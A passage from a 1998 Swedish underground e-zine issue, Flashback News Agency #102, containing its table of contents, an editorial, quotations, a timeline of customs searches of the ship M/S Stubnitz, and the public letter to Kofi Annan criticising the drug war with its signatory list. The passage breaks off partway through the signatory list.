*  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *


        F L A S H B A C K N E W S A G E N C Y # 1 0 2

             Vol.4 No.7 | 10 Juni 1998
          Antal Prenumeranter : 48.720 (+122)

     You Are What You Know - You Are What You Do - Help Yourself
       No More Secrets - No More Excuses - No More Limits

              Redaktör: Jan Axelsson


  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *

Flashback News Agency 4.07:
===========================

01.......Ledare.............................................................
02.......Tänkvärda citat....................................................

d r o g e r & d r o g k u l t u r :

03.......M/S Stubnitz vs. Svensk Knarkhysteri 98............................
04.......Public Letter to Kofi Annan........................................
05.......Drogtester allt vanligare på arbetsplatser.........................

h a c k i n g / c o m p u t e r u n d e r g r o u n d / i t :

06.......Tha Evil Felia Fuckers iNC presenterar Veckans hackade Telia sidor
07.......Porrbild på kungen som naken kvinna upprör KTH....................
08.......Internet dom i Tyskland får kritik................................
09.......Hackers stal data om bomber.......................................
10.......Telia Nemesis v.1.4 släpps 20 juni................................
11.......Källkoden (Visual Basic) för Telia Nemesis........................
12.......Farlig ICQ floodare...............................................
13.......Anonymitets servern Zoom läggs ned................................

p o l i t i k & t e r r o r i s m :

14.......Invandrare dömd för hitlerhälsning................................

f l a s h b a c k :

15.......Flashback Foundation..............................................
16.......Flashback Logo in ascii...........................................
17.......Viktig information angående Flashbacks mailinglistor..............
18.......Nyheter på Flashbacks hemsida.....................................
19.......FNA-boken sålde slut samma dag....................................

r e l i g i on / f i l o s o f i / k o n s p i r a t i o n :

20.......Gud till salu: kristendomen en miljardindustri....................
21.......Intervju med J. Sonesson (satanist & grundare av Belial Center)...

n o t i s e r / ö v r i g t :

22.......Falska entréband till Hultsfreds Festivalen till salu.............
23.......Platsannons: Bödel sökes..........................................
24.......Frågor & svar......................................................
      i. är det olagligt att sprida serie nummer?
      ii. re: vilka regler gäller ang. mp3?
25.......Feedback...........................................................
      i. re: 57 miljoner e-mail adresser säljes för 750kr
      ii. re: citat
     iii. re: icq
      iv. re: folkmord i profitens tecken
      v. passwords
26.......Svarta Börsen......................................................
      i. säljes
      ii. köpes
     iii. bytes
      iv. övrigt
27.......Links to the Underground...........................................
28.......Smått & gott.......................................................

__________________________________________________________________________

m e d a r b e t a r e / b i d r a g s g i v a r e | f n a # 1 0 2 :

Anonym @ #020.se, bluefish, Calle, Cerial Phreak, CY£Uß, Dr Shaddack, GREN,
Jonas Hansson, Aron Håkanson, Janos, Lars, Mattias, Mats, Micke, Morot,
Powered By Will, Pelle Rylander, Sluggo, Spam King?, tEFF Crew,
Johan Zandin

m e d f l e r a . . .

__________________________________________________________________________


1. LEDARE | 980610
================

Jodå, nu börjar FNA's utgivningstakt att återgå till det normala.
Det är inte ens en vecka sedan förra FNA kom, och förhoppningsvis kommer
nästa FNA redan nästa vecka. Vi får väl se hur länge denna utgivningstakt
håller i sig. Det beror ju framförallt på hur pass flitiga ni som läsare är.
I övrigt läggs det upp en mängd olika saker på Flashbacks hemsida nu. Så
mycket att jag valt att uppmärksamma detta i ett eget stycke längre fram.

Jan Axelsson
jan.axelsson@flashback.se

__________________________________________________________________________


2. TÄNKVÄRDA CITAT
==========================

"Nazismens politiska farlighet ligger i dess förmåga att provocera
hedervärda demokrater till att inskränka demokratiska rättigheter.
Det är som om en del demokrater inte trodde på demokratins förmåga att
försvara sig med blanka vapen (åsiktsfrihet, yttrandefrihet) utan måste
ta till motståndarens (åsiktsregistrering, förbud för vissa yttranden).
Vem står då som vinnare?"
 - Per Nygren

"Det utmärkande för den skada som vållas genom att man undertrycker
en åsikt ligger däri att man sålunda begår en stöld från mänskligheten,
från de efterkommande såväl som från de nu levande, från de som avviker
från åsikten ännu mer än från de som hyser den. Om åsikten är riktig
berövas de möjligheten att utbyta villfarelsen mot sanningen. Är den
oriktig går de miste om en nästan lika stor förmån, nämligen den klarare
insikt om och åskådligare bild av sanningen, som uppkommer då denna
konfronteras med villfarelsen."
 - John Stuart Mill

"Cautious, careful people, always casting about to preserve their
reputation and social standing, can never bring about a reform."
 - Susan B Anthony

"En fullkomlig nyhet, alltså något som inte hänt förut, nån gång, vars
episka mönster är helt okänt, skulle troligen inte komma in i en
tidning. Den skulle inte gå att känna igen, och troligen inte att
återge. Definitionen på en nyhet är nämligen inte att den aldrig hänt
förut, utan att den hänt så många gånger förut att man omedelbart känner
igen den som en nyhet."
 - Anders Enmark

"If men reach the point of losing respect for property, everyone will have
property, as all slaves become free men as soon as they no longer respect
their master as master."
 - Max Stirner

"No kind of sensation is keener and more active than that of pain; its
impressions are unmistakable."
 - DAF de Sade

"Sabotage will set us free throw a rock in the machine..."
 - Dennis Lyxzén (Refused)

[Bidragsgivare: Mats, Morot & Johan Zandin]

Tänkvärda citat bör du skicka till: fna@flashback.se

__________________________________________________________________________

       > > > D R O G E R & D R O G K U L T U R < < <
__________________________________________________________________________


3. M/S STUBNITZ VS. SVENSK KNARKHYSTERI 98
==========================

Händelseförlopp M/S Stubnitz 97/98

Juni 97: The Nursery inkommer med programförslag till KHS´98 som
innefattar ett engagemang av den tyska båten M/S Stubnitz.

Sommaren 97: Vi jobbar tillsammans med The Nursery för att undersöka
möjligheterna till och kostnaderna det skulle innebära att ta hit M/S Stubnitz.

September 97: Jag åker ner till M/S Stubnitz i Rostock tillsammans med två
representanter från The Nursery för att bilda mig en uppfattning om
fartyget samt programmet som läggs ombord.

26 September 97: Ett 'letter of intent' skickas till M/S Stubnitz där
KHS´98 bjuder in fartyget att ingå i KHS´98s program sommaren 98 som plattform
för den experimentella musik The Nursery kommer presentera under sin
musikfestival 'The Nursery Injection'.

Hösten 97: Fortsatta förhandlingar med M/S Stubnitz samt föreningen The
Nursery.

November 97: första kontakten med Stockholms Hamn knyts (Jarl Kjellegård)
som får projektet presenterat för sig och som åtar sig att leta efter en
passande kajplats för M/S Stubnitz i Stockholm.

11 december 97: Vi blir tilldelade kajplats 161, Stadsgården, för
fartyget.

26 januari 98: Ett brev kommer från kulturministeriet i
Mecklenburg-Vorpommern som lyckönskar projektet.

Februari 98: Fyra medlemmar från fartyget besöker Stockholm samt
riktlinjer för projektet spikas.

Mars 98: Alkoholinspektionen(Tove Larsson och Birgitta Holm) kontaktas för
att undersöka möjligheterna för M/S Stubnitz att importera tyskt öl för
försäljning ombord. Då detta är ett såpass unikt fall kan de inte fatta
beslut i frågan(möjligheten till ett prejudikat diskuterades, men de ansåg
inte frågan vara av såpass stor dignitet).
Då kontaktas Tullverket och frågan ställs till dem om hur man skall gå
till väga. Vad beträffar ölen så diskuteras möjligheterna och rådet är att
'inte väcka den björn som sover' då detta fall är så pass unikt(tyvärr
saknas uppgift om vem på Tullverket som rådde mig, men det var en av deras
jurister). Ingen övrig information gavs vad beträffar förfarandet av Tullen
när M/S Stubnitz skulle komma.
Sjöfartsverket i Norrköping kontaktas(Christer Ingelsten) som rådfrågas
om förfarandet vid fartygsbesök i Sverige. Beskedet var att så länge M/S
Stubnitz hade giltiga tyska papper behövdes inga svenska tillstånd.
Första kontakten med Brandskyddsmyndigheten(Sven Sandberg) togs för att
kunna planera möjliga åtgärder.

April 98: Brandinspektör Sven Sandberg reser till Rostock för att
besiktiga skeppet samt planera för möjliga åtgärder.
Beslut fattas hos KHS´98 att genomföra projektet samt att anställa en
producent för programläggningen ombord.
M/S Stubnitz tar kontakt med en bekant som importerar öl till Sverige som
ger dem tillstånd att importera ölen på sitt importtillstånd.
Särskilda skattekontoret i Ludvika(Ann-Katrin Andersson)kontaktas för att
utröna hur alkoholskatten skall betalas. De lämnar beskedet att när ölen
förtullats skall det redovisas till dem och alkoholskatten
betalas(1.47*procent*antal liter).
Kontakten upprätthålls med Stockholms Hamn som informerar om alla turer
som behövs ta i beaktande vid fartygets ankomst till Stockholm(berättar
dock inget om rapporteringsskyldighet till Tullen 48 timmar innan ankomst).

Maj 98: Producent anställs (Fredrik Norberg) som reser ner till M/S
Stubnitz för att träffa besättningen samt planera program ombord.
Polisen(Björn Ericsson) kontaktas och tillstånd söks för att bedriva
musiktillställningar, dansevenemang samt teaterföreställningar ombord.
Stockholms resursförvaltning, Tillsdånsmyndigheten(Anna Grönblad)
tillstånd söks för alkoholutskänkning.
Besked kommer från M/S Stubnitz att man måste skjuta upp avfärd från
Rostock till den 27 maj då alla inspektioner ej är klara. Resan beräknas ta
50 timmar från Rostock till Stockholm.

25 maj 98: Inbjudan skickas till pressen att närvara vid invigning av
fartyget den 31 maj.

26 maj 98: Trafikledningen på Stockholms Hamn kontaktas och informeras om
läget.

27 maj 98: Sista besiktningen utförs på öppet vatten av fartyget och allt
godkänns.

28 maj 98 Intygen från tyska sjöfartsministeriet dröjer och medlemmar ur
besättningen reser till Hamburg för att skynda på processen samt kontakt
tas med Sjöfartsverket i Norrköping som ombeds utfärda ett tillfälligt
internationellt transitintyg som ger fartyget rätt att resa mot Stockholm
innan intygen från Hamburg kommer.

29 maj 98: Resan påbörjas klockan 08.00 och fartyget lämnar Rostock.

30 maj 98: M/S Stubnitz ringer och berättar att en packning gått sönder
och att de inte kan gå med full fart. Söndagkvällens arrangemang ställs in.

31 maj 98: Klockan 15.00 anländer M/S Stubnitz till Landsort och tar
ombord lots. Klockan 20.30 angör M/S Stubnitz Kajplats 161, Stadsgården.
Jourhavande hamnstyrman(Sven Kirs) finns på plats och ser till att förtöjningen
går rätt till. Alla på plats ställer sig frågande till varför inte Tullen
finns på plats.

1 juni 98: Tullen besöker skeppet och går igenom hela skeppet med hundar
och manskap. De påträffar ett gram hasch och ett par karatepinnar samt en
burk tårgasspray. Tullen beslagtar fem flaskor Óhampa ölÓ, 3.3 gram svamp
samt grönt the för provtagning. Ombord finns även 200 tunnor öl (Rostocker
Pils) som deklareras.Tullen utför även en klarering av skeppet och
bötfäller(900:-) dem för att de inte föranmält sin ankomst senast 48 timmar
innan ankomst. Boten betalas på plats kontant. The Nursery har en sluten
tillställning på kvällen.

2 juni 98: Särskilda skattekontoret i Ludvika kontaktas och de faxar över
blanketter för leverensanmälan.
Brandsyn utförs av Sven Sandberg som godkänner fartyget för 300 besökare
under däck.
Tullen genomsöker fartyget på nytt och hittar denna gång fyra gram hasch,
en butterflykniv och en elpistol.
Sjöfartsverket besöker fartyget och gör en snabbbesiktning, fartyget
godkänds.

3 juni: Besked från tullmyndigheten att 'hampa ölen' ej innehöll
narkotika. Tullens granskning av M/S Stubnitz är slutförd.

Jacob Broms
program secretary music
Stockholm-Cultural Capital of Europe 1998

Nursery har en egen hemsida.
URL: http://www.flashback.net/~nursery/

__________________________________________________________________________

4. PUBLIC LETTER TO KOFI ANNAN
==========================

Public Letter to Kofi Annan

 June 1, 1998

 Mr. Kofi Annan
 Secretary General
 United Nations
 New York, New York
 United States

 Dear Secretary General,

On the occasion of the United Nations General Assembly Special Session on
Drugs in New York on June 8-10, 1998, we seek your leadership in
stimulating a frank and honest evaluation of global drug control efforts.

We are all deeply concerned about the threat that drugs pose to our
children, our fellow citizens and our societies. There is no choice but to
work together, both within our countries and across borders, to reduce the
harms associated with drugs. The United Nations has a legitimate and
important role to play in this regard -- but only if it is willing to ask
and address tough questions about the success or failure of its efforts.

We believe that the global war on drugs is now causing more harm than drug
abuse itself.

Every decade the United Nations adopts new international conventions,
focused largely on criminalization and punishment, that restrict the
ability of individual nations to devise effective solutions to local drug
problems. Every year governments enact more punitive and costly drug
control measures. Every day politicians endorse harsher new drug war
strategies.

What is the result? U.N. agencies estimate the annual revenue generated by
the illegal drug industry at $400 billion, or the equivalent of roughly
eight per cent of total international trade. This industry has empowered
organized criminals, corrupted governments at all levels, eroded internal
security, stimulated violence, and distorted both economic markets and
moral values. These are the consequences not of drug use per se, but of
decades of failed and futile drug war policies.

In many parts of the world, drug war politics impede public health efforts
to stem the spread of HIV, hepatitis and other infectious diseases. Human
rights are violated, environmental assaults perpetrated and prisons
inundated with hundreds of thousands of drug law violators. Scarce
resources better expended on health, education and economic development are
squandered on ever more expensive interdiction efforts. Realistic proposals
to reduce drug-related crime, disease and death are abandoned in favor of
rhetorical proposals to create drug-free societies.

Persisting in our current policies will only result in more drug abuse,
more empowerment of drug markets and criminals, and more disease and
suffering. Too often those who call for open debate, rigorous analysis of
current policies, and serious consideration of alternatives are accused of
"surrendering." But the true surrender is when fear and inertia combine to
shut off debate, suppress critical analysis, and dismiss all alternatives
to current policies. Mr. Secretary General, we appeal to you to initiate a
truly open and honest dialogue regarding the future of global drug control
policies - one in which fear, prejudice and punitive prohibitions yield to
common sense, science, public health and human rights.

Sincerely,

ARGENTINA

 Graciela Fernandez Meijide
 Member of Congress

 Irma Fidela Parentella
 Member of Congress

 Gustavo Hurtado
 Coordinación Ejecutiva del Programa de Drogadependencia de la Ciudad de
Buenos Aires

 Carlos Juan Moneta
 Permanent Secretary of the Latin American Economic System (SELA)

 Adolfo Perez Esquivel
 Nobel Laureate (Peace)

 Graciela TouzU
 President, Intercambios

AUSTRALIA

 Dick Adams
 House of Representatives, National Parliament

 Lyn Allison
 Senator, National Parliament

 Peter Baume
 Former Cabinet Minister; Chancellor, Australian National University

 Kevin Berry
 Olympic Gold Medallist

 Ald. Pru Bonham
 Deputy Lord Mayor, Hobart

 Ted Bramble
 Lawyer, Civil Libertarian

 Peter Brooks
 Dean, Health Sciences, University of Queensland

 John Brumby
 Leader of the Opposition, Victoria

 Ita Buttrose
 Journalist, author

 John Cain
 Former Premier, Victoria

 Dr. Greg B. Chesher
 Pharmacologist

 Assoc. Prof. Macdonald J. Christie
 Department of Pharmacology, University of Sydney

 Peter Cleeland
 Former Politician

 Barney Cooney
 Senator from Victoria

 Dr. Nick Crofts
 Public researcher

 Paul Deany
 Executive Officer, Asian Harm Reduction Network

 Mary Delahunty
 Journalist

 Ivor Deverson
 Lord Mayor, Melbourne

 Bob Douglas
 Professor of Epidemiology, Australian National University

 Alex Dr. Wodak
 Physician

 Phillip Dunn QC
 Barrister

 Paul Ellercamp
 Journalist

 Peter Fritz
 Founder and Managing Director, TCG Group of Companies

 Dr. Peter Graham
 General Practitioner

 Randolph Griffiths
 Former Sydney City Councillor

 Sir Rubert Hamer
 Former Premier, Victoria

 Susan Irvine
 Senior Lecturer, Public Health

 Harry Jenkins
 House of Representatives, National Parliament

 Michael Kirby, AC CMG
 President, International Commission of Jurists

 Joan Kirner
 Former Premier, Victoria

 John Konrads
 Olympic Gold Medallist

 Professor Jara Krivanek
 Technical University of Ostrava Czech Republic

 Richard Larkins
 Chairman, National Health and Medical Research Council

 Steve Leeder
 Dean, Medical Faculty, Sydney University

 Helen Lochhead
 Architect

 Frank Merlino
 Mayor, City of Whittlesea

 David Penington
 Former Vice Chancellor, Melbourne University

 Ron Penny
 Professor of Immunology, University of New South Wales

 Bronwyn Pike
 Executive Officer, Evatt Centre

 Phil Puna
 Attorney

 Dr. Adrian Reynolds

 Robert Richter QC
 Barrister

 Leo Schofield
 Director, Sydney Festival

 Richard Smallwood
 Former President, Royal Australasian College of Physicians

 Dr. Nadia Solowij
 National Drug & Alcohol Research Centre, University of NSW

 John Spatchurst
 Principal, Spatchurst Design Associates

 Bill Stronach
 Australian Drug Foundation

 Kelvin Templeton
 Sportsman and Sports Administrator

 Charles Watson
 Dean Health Sciences Curtin University

 David White
 Former Politician

 Michael Willesee
 TV Broadcaster

 Charles Williams
 Dean of Law, Monash University

 Neville Wran
 Former Premier, New South Wales

BELGIUM

 Yves Cartuyvels
 Professor of Penal Law, University of Saint-Louis, Brussels

 Stanley Crossick
 Chairman, European Policy Centre

 Vincent Decroly
 Member of Parliament, Brussels

 Christine Guillain
 Attorney, Researcher, School of the Criminological Sciences, Free
University of Brussels

 Dan Kaminski
 School of Criminology, Catholic University of Louvain-la-Neuve

 Philippe Mary
 Professor of Criminology, Vice-President, School of Crimininological
Sciences, Free University of Brussels

 Patrick Moriau
 University of Brussels Member of Parliament, Mayor of Chapelle-lez-Herlaimont

 Ilya Prigogyne
 Emeritus professor physical chemistry, Free University of Brussels; Nobel
Laureate (Chemistry, 1977)

 Olivier Ralet
 Former head, PEDDRO drug prevention project, UNESCO/European Union

 Micheline Roelandt
 Psychiatrist

 Sonja Snacken
 Ph.D., Professor of Criminology and Sociology of Law, Free University of
Brussels

 Isabelle Stengers
 Philosopher, Free University of Brussels; Winner "Grand Prix de
Philosophie de L'Académie Française

 Lode Van Outrive
 Emeritus Professor of Criminology, Leuven University; Former Member of the
European Parliament

BOLIVIA

 Antonio Aranibar Quiroga
 Former Foreign Minister

 Edgar Camacho Omiste
 Former Ambassador to the OAS

 Roger Cortez-Hurtado
 Former Member of Congress

 Juan del Granado
 Member of Congress

 Alfonso Ferrufino Valderrama
 Former Vice-President of the Bolivian House of Representatives

 Horst Grebe Lopez
 Former Cabinet Minister

 Lidya Gueiler Tejada
 Former President of Bolivia

 Roberto Moscoso Valderrama
 Member of Congress

 Ricardo Paz Ballivian
 Former Member of Congress

 Carlos Julio Quiroga Blanco
 Member of Congress

 Guillermo Richter A.
 Former Senator

 Gonzalo Ruiz
 Member of Congress

 Manuel Suarez Avila
 Member of Congress

 Felix Vasquez Mamani
 Member of Congress

BRAZIL

 Ana Magnólia Bezerrá Mendés
 Assistant Professor, University of Brasilia

 Pedro Casaldaliga
 Catholic Bishop of São Felix do Araquaia

 Luiz Inacio Lula Da Silva
 Presidential Candidate, Brazil; Honorary President of the Workers Party

 Fabio Mesquita
 Researcher, University of São Paulo, Brasil; Executive Director of the Latin
 American Harm Reduction Network

CANADA

 Glenn A. Gilmour
 Lawyer, Ottawa

 James A. Wakeford
 AIDS Activist, Toronto

 Frank Addario
 Criminal Lawyer

 Chris Axworthy
 Member of Parliament, Saskatoon, Saskatchewan

 Marie-Andrée Bertrand
 Professor Emeritus of Criminology, University of Montreal; President,
 International Antiprohibitionist League, Montreal, Quebec

 Barry L. Beyerstein, Ph.D.
 Brain Behavior Laboratory, Simon Fraser University

 Barry L. Beyerstein, PhD
 Brain Behavior Laboratory, Department of Psychology, Simon Fraser
University, Burnaby, B.C.

 Neil Boyd
 Professor, School of Criminology, Simon Fraser University, Vancouver

 J.A. Browne
 Parent, Burlington, Ontario

 C. Michael Bryan
 Formerly Special Assistant, Commission of Inquiry into the Non-Mecial Use
of Drugs (Le Dain Commission); Senior Policy Analyst (Narcotic Control
Policy), Health Protection Branch, Health Canada

 Paul Burstein
 Criminal Lawyer

 Sharon Carstairs
 Senator, former Chair, Standing Senate Committee on Legal and
Constitutional Affairs, Sente of Canada

 John W. Conroy
 Barrister & Solicitor, Mission , B.C.

 Paul Copeland
 Lawyer; Columnist on Drug Law, Ontario Criminal Lawyers' Association
Newsletter, Toronto

 Laura Cowan, RN
 Executive Director of Street Health, Toronto, Ontario

 Libby Davies
 Member of Parliament, Vancouver-East

 Jonathan Dawe
 Barrister, Toronto, Ontario

 Denise De Pape
 Bev Desjarlais
 Member of Parliament, Manitoba

 Marion Dewar
 HAIA Oxfam Canada, Ottawa

 Jari Dvorek
 Medical Marijuana Activist, Toronto

 Richard Elliott
 President, Canadian HIV/AIDS Legal Network, Toronto

 Patricia G. Erickson, PhD
 Senior Scientist, Addiction Research Foundation, Division of the Addiction
and Mental Health Services Corporation, Professor of Sociology, University
of Toronto

 Michael Farrance
 Addictions Coordinator, City of Toronto Hostels Division, Toronto

 Yvon Godin
 Member of Parliament, Bathhurst, NB

 Irene Goldstone
 B.C. Centre for Excellence in HIV/AIDS, Vancouver

 Dr. Richard Gould
 Community Medicine Specialist, Toronto

 Edward L. Greenspan, QC
 Senior Partner, Greenspan, Nenein & White, Toronto

 Catherine Hankins
 Public Health Epidemiologist, Chair of the Canadian Task Force on HIV and
Injection Drug Use, Montreal

 David Harvey
 Oakville, Ontario

 Shaun Hopkins
 Manager, The Works

 Andrew J. Rapoch
 Former President, National Organization for the Reform of the Marijuana
Laws (NORML), Ottawa, Ontario

 Jane Jacobs
 Author

 Ralf Jorgens
 Executive Director, Canadian HIV/AIDS, Legal Network, Montreal

 J. Robertt. Kellerman
 Law Union of Ontario, Steering Committee

 Perry Kendall
 Former president, Addiction Research Foundation, Victoria

 Rick Laliberte
 Member of Parliament, Churchill River, Beauval, Saskatchewan

 Pierre Landreville
 Professer of Criminology, University of Montreal

 Wendy Lill
 Member of Parliament, Dartmouth

 Dennis Long
 President, Ontario Federation of Community Addictions and Mental Health
Programs; Executive Director, Breakaway Substance Abuse Treatment Centre,
Toronto, Ontario

 Paul MacPhee
 Co-Chair AIDS Action Now!, Toronto, Ontario

 Peter Mancini
 Member or Parliament

 Ron Mann
 Filmmaker, Toronto

 Patrick Martin
 Member of Parliament, Winnipeg, Manitoba

 Vishnu Mathur
 T.V. Producer, Toronto

 Alexa McDonough
 Member of Parliament, Federal Leader of New Democratic Party, Ottawa, Canada

 Ruth Morris
 Education Director, Toronto

 Lorne Nystrom
 Member of Parliament, N.D.P., Qu'Appelle, Regina, Saskatchewan

 Eugene Oscapella
 Lawyer, former Chair, Law Reform Commission of Canada Drug Policy

 George Panagpa
 F.U.M Group - Parkdale Comunity Health Center

 John C. Polanyi
 Nobel Laureate (Chemistry, 1986), Toronto, Ontario

 Gil Puder
 Police Officer, Abbotsford, BC

 Diane Riley, PhD
 International Harm Reduction Association, Toronto

 Svend Robinson
 Member of Parliament, New Democratic Party of Canada, Burnaby-Douglas

 Greg Robinson
 Co-Chair AIDS Action Now!, Toronto

 Dr. David Roy
 Director, Centre for Bioethics, Clinical Research Institute of Montreal

 Clayton Ruby
 Lawyer, Toronto

 Gordon S. Earle
 Member of Parliament, Halifax, Nova Scotia

 Dr. John S. Millar
 Provincial Health Officer, Ministry of Health and Ministry Responsible for
Seniors, Victoria, British Columbia

 Pat Sanagan
 Substance Abuse Prevention Consultant

 Jan Skirrow
 Consultant; Former CEO Alberta Alcohol & Drug Abuse Commission; Deputy
Minister of Community and Occupational Health, Alberta; Founding CEO
Canadian Centre on Substance Abuse, Duncan, BC

 Robert St-Pierre
 HIV Program Coordinator, Canadian Hemophilia Society, Montreal

 Terence Stewart
 Canadian Aids Society, Ottawa

 Peter Stoffer
 Member of Parliament - New Democratic Party of Canada

 Neev Tapiero
 Medical Cannabis Activist and Dispenser, Toronto

 Jeannette Tossounian
 MUM (Marijuana Used for Medicine), Kitchener, Ontario

 Elaine Vautour
 Counsellor, Toronto, Ontario

 Judy Wasylycia-Leis
 Member of Parliament, Winnipeg

 Dr. Jonathan Wouk
 Ottawa, Ontario

CHILE

 Ariel Dorfman
 Writer

CHINA

 Spencer So
 Community Drug Advisory Council


COLOMBIA

 Arturo Alape
 Writer

 Gustavo Alvarez Gardeazabal
 Governor, Department of Valle de Cauca

 Belisario Betancur
 Former President

 Juan Manuel Santos
 President, Fundacion Buen Gobierno

 Alvaro Mutis
 Writer

 Augusto Ramirez Ocampo
 Former Foreign Minister; National Recociliation Commission

COSTA RICA

 Oscar Arias
 Nobel Laureate (Peace); Former President of Costa Rica

DENMARK

 Hans Henrik Brydensholt
 High Court Judge, Former Director of the Danish Prison and Probation
Service, Former Head of Section in the Danish Ministry of Justice

 Bjørn Elmquist
 Former Member of Parliament and Chairman of Parliamentary Permanent
 Committee on Justice

 Jørgen Jepsen
 Centre of Alcohol & Drug Research, University of Aarhus

 Erik Merlung
 District Attorney, Copenhagen

 Erling Olsen
 Former Minister of Justice, Former Chairman of the Danish Parliament, Former
 Professor of Economics at the University of Copenhagen

 Villy Søvndal
 Member of Parliament, Chairman of the Permanent Parliamentary Committee
 on Social Affairs

ECUADOR

 Washington Herrera
 Former Presidential Minister

FINLAND

 Inkeri Anttila
 Professor of Penal Law, University of Helsinki; Former Minister of Justice

 Kauko Aromaa
 Research Director, National Research Institute of Legal Policy

 Pekka Koskinen
 Professor of Penal Law, University of Helsinki

 Klaus Maekelae
 Research Director, Finnish Foundation for Alcohol Studies

 Hannu Takala
 Executive Secretary, National Council for Crime Prevention

 Patrik Tornudd
 Former Director of National Research Institute of Legal Policy

FRANCE

 Claude Aiguevive, MD
 Vice President, Médecins du Monde

 Josefina Alvarez
 Research Group on Criminal Policy, University of Montpellier I

 Bruno Aubusson de Cavarlay
 Research Engineer, Guyancourt

 Dr. Elisbeth Avril
 Médecins du Monde

 Michèle Barzach
 Former Minister of Health

 Georges Berthoin
 International Honarary Chairman of the European Movement, Paris France

 Mario Bettati
 Professor of International Law, Paris University

 Francis Caballero
 Professor of Law, Paris University

 Jean-Pierre Changeux
 Professor of Molecular Neurobiology, Pasteur Institute and College de France

 Anne Coppel
 Sociologist

 Claude Faugeron
 Research Director, Co-Director, CNRS Drug Research Group, Paris

 Andre Glucksman
 Philosopher

 Marek Halter
 Writer

 Michel Kazatchkine
 Professor of Immunology, Paris University

 Catherine Lalumiere
 MPE (Member of the European Parliament)

 Jacques Lebas, MD
 President, Institut de l'Humanitaire, Paris

 Bertrand Lebeau
 Head Centre Parmentier Paris

 Thierry Levy
 Attorney

 William Lowenstein, MD
 Head, Montecristo Center, Paris

 Jacky Mamou
 President, Médecins de Monde

 Arnaud Marty Lavauzelle
 President, AIDES

 Monique Nahas
 Professor, University of Paris VIII

GERMANY

 Lorenz Böllinger
 Professor of Law, University of Bremen

 Daniel Cohn-Bendit
 Member, European Parliament; Commission for Civil Rights and Internal Affairs

 Barbara Duden
 Professor of Historical Sociology, Hannover, Germany

 Peter Frerichs
 Vice President, Frankfurt Police

 Prof. Dr. Monika Frommel
 Criminal Law, School of Criminology, University of Kiel

 Günter Grass
 Writer

 Prof. Dr. Axel Grönemeyer
 Center for Social Problems, Public Health and Social Policy, University of
Bielefeld

 Johannes Gross
 Journalist, Author, Talk show host, former editor "Capital"

 Prof. Dr. Bernhard Haffke
 Criminal Law, University of Passau

 Ivan Illich
 Philosopher

 Dr. Hans Harald Koerner
 Public Prosecutor, Frankfurt

 Leutheuser-Schnarrenberger
 Former German Federal Minister of Justice, drug political speaker, FDP Party

 Sabine Leutheusser-Schnarrenberger
 Former German Federal Minister of Justice

 Heide Moser
 Minister of Employment and Social Affairs, State of Schleswig-Holstein

 Prof. Dr. Cornelius Nestler
 University of Köln

 Margarethe Nimsch
 Former Minister for Health, State of Hessen, Germany

 Prof. Dr. Cornelius Prittwitz
 Criminal Law, University of Rostock

 Prof. Dr. Stephan Quensel
 Professor of Sociology, University of Bremen

 Prof. Dr. Sebastian Scheerer
 Aufbau- und Kontaktstudium Kriminologie, University of Hamburg

 Prof. Dr. Konrad Schily
 President, University of Witten-Herdecke

 Hartmut Schneider
 District Court Judge, Lübeck

 Dierk-Henning Schnitzler
 Police President, City of Bonn, Christian Democrate

GREECE

 Alexis Grivas
 Foreign Correspondent El Sol de Mexico Daily

 Nicos Mouzelis
 Professor of Sociology, London School of Economics, Athens

 Nocis Papadakis
 Press Counsellor, Greek Embassy in London

 George Papandreou
 Alternate Foreign Minister of Greece

 Michaelis Papayannakis
 Member European Parliament

 Anthony D. Papayannides
 Journalist, Publisher

 James Pettifer
 Visiting Professor, Institute of Balkan Studies, University of Thessaloniki

 Voula Tsinorema
 Professor of Philosophy, University of Ioannina

 Georgos Votsis
 Political Editor, Eleftherotypia Newpaper, Athens

GUATEMALA

 Arnaldo Ortiz Moscoso
 Former President of the Bar Association, Guatemala

HUNGARY

 Jánes Kis
 Philosopher

INDIA

 Jimmy Dorabjee
 Program Manager, Society for Serving the Urban Poor, New Delhi

IRELAND

 Ivana Bacik
 Reid Professor of Criminal Law, Trinity College, Dublin

 Vincent Browne
 Journalist; Lawyer

 Tim Murphy
 Lecturer in Law, University College, Cork

 Daire O'Brien
 Editor, Himself Magazine

 Olaf Paul Tyaransen
 Writer

ISREAL

 Yossi Beilin
 Former Minister, Member of Knesset, Tel Aviv

 Haim Cohn
 Former Deputy President of the Israel Supreme Court, Professor of Penal
 Philosophy

 Prof. Ruth Gavison
 Haim Cohn Professor of Human Rights, Hebrew University; President of the
Israel Civil Rights Association; Member, International Commission of Jurists

 Menachem Horovitz
 Former Director of Correctional Services, Department of Welfare and
Labour; Research and Teaching Associate, Institute of Criminology, Hebrew
University

 Leslie Sebba, JD
 Associate Professor, Law Faculty, Hebrew University; former Chairperson of
the Criminology Council.

ITALY

 Vittorio Agnoletto
 President of the Italian League Against AIDS

 Monica Bettoni-Brandani
 Undersecretary of State for Health

 Giovanni Bollea
 Professor of Neuropsychiatry, University of Rome

 Emma Bonino
 European Commissioner for Humanitarian Affairs

 Nicoletta Braschi
 Actress

 Francesco Carella
 President Health Commission of the Senate

 Don Luigi Ciotti
 President, Gruppo Abele, Torino

 Dario Fo
 Nobel Laureate (Literature 1997)

 Luigi Manconi
 Senator, President of the Green Party, Rome

 Livio Pepino
 President, Magistratura Democratica

 Giuliano Pisapia
 President, Justice Commission, Italian Parliament, Rome

 Franca Rame
 Actress

 Stefano Rodota
 President, Authority for Privacy

 Ersilia Salvato
 Vice-President, Senate, Rome

 Grazia Zuffa
 President, Forum Droghe; Former Member of Parliament, Florence

JAMAICA

 Colonel (R) Trevor N.N. MacMillan, C.D.J.P.
 Former Commissioner of Police, Jamaica Constabulary Force; Former
Director, Revenue Protection Division, Ministry of Finance

LUXEMBOURG

 Renée Wagner
 Member of Parliament, Luxemburg; President of the Green Party; Member,
Special Parliamentary Commssion on Drugs

MALAYSIA

 Susan Chong
 Malaysian AIDS Council

 Hisham Hussein
 Malaysian AIDS Council

 G. Chacko Vadaketh
 Chair, Law and Ethics Committee, Malaysian AIDS Council; Advocate and
Solicitor, Kuala Lumpur

MEXICO

 Mariclare Acosta
 President of the Mexican Comission for the Defense and Promotion of Human
Rights (CMDPDH)

 Homero Aridjis
 President, International Organization of Literary Writers & Editors

 Carlos Heredia Zubieta
 Member of Congress

 Gilberto Lopez y Rivas
 Member of Congress

 Jesus Silva Herzog
 Former Mexican Ambassador to the United States

NETHERLANDS

